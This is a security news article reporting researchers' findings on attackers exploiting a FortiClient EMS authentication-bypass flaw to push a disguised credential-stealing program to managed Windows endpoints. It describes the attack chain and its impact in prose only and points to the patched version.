Threat actors are actively exploiting a critical security flaw affecting FortiClient Endpoint Management Server (EMS) deployments to distribute credential stealing malware across managed systems, according to cybersecurity researchers. Security firm Arctic Wolf reported observing the malicious activity during May 2026, warning that attackers abused trusted endpoint management infrastructure to deliver malware disguised as legitimate Fortinet software updates. The campaign exploited a now patched vulnerability identified as CVE 2026 35616, a critical pre authentication API access bypass vulnerability that could lead to privilege escalation. Fortinet addressed the issue in FortiClient EMS version 7.4.7 and later, but researchers caution that organizations running unpatched environments remain exposed to compromise.
According to Arctic Wolf, attackers used the vulnerability to gain unauthorized privileged access within FortiClient EMS and modify management configurations that affected all connected endpoint devices. Following successful exploitation, threat actors reportedly altered system settings to postpone firmware update notifications and modified Remote Access Profile configurations and endpoint policies to insert malicious scripts for execution on managed systems. Researchers stated that attackers leveraged FortiClient’s legitimate management mechanisms to distribute malicious PowerShell commands in a manner that closely resembled normal administrative activity. Because the endpoint management server acts as a centralized control system, attackers were able to expand their reach to all managed devices without needing separate intrusion paths for each endpoint, increasing the scale and impact of the operation.
The attack chain involved the abuse of a legitimate FortiClient executable known as fortitray.exe, which was used to launch a malicious command script through cmd.exe. Researchers explained that the script executed a Base64 encoded PowerShell command designed to download and run an executable named FortiEndpoint_Patch.exe while also transmitting stolen information to an external server through an HTTP POST request. The payload masqueraded as a Fortinet endpoint update but functioned as a previously undocumented Windows information stealer capable of harvesting sensitive browser data. Arctic Wolf found that the malware targeted passwords, session cookies, and autofill information, including payment card details, addresses, and phone numbers stored within Chromium based and Gecko based browsers. Collected information was written to a log file and stored within the ProgramData directory before being prepared for exfiltration through the PowerShell component of the attack.
Researchers noted that while the information stealer itself lacked built in network communication features, the surrounding PowerShell script handled data transmission to attacker controlled infrastructure, specifically an external IP address linked to the operation. Arctic Wolf stated that by bypassing API authentication and operating within a privileged EMS environment, attackers gained the ability to manipulate trusted management functions and silently push malicious commands to connected systems. Security experts warned that stolen session cookies and browser credentials may allow attackers to gain unauthorized access to cloud services, enterprise applications, and internal systems, potentially bypassing multi factor authentication protections through session reuse. The findings highlight the growing risks associated with attacks targeting centralized management platforms, where a single exploited vulnerability can provide access to large numbers of connected endpoints if security updates and monitoring controls are delayed.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
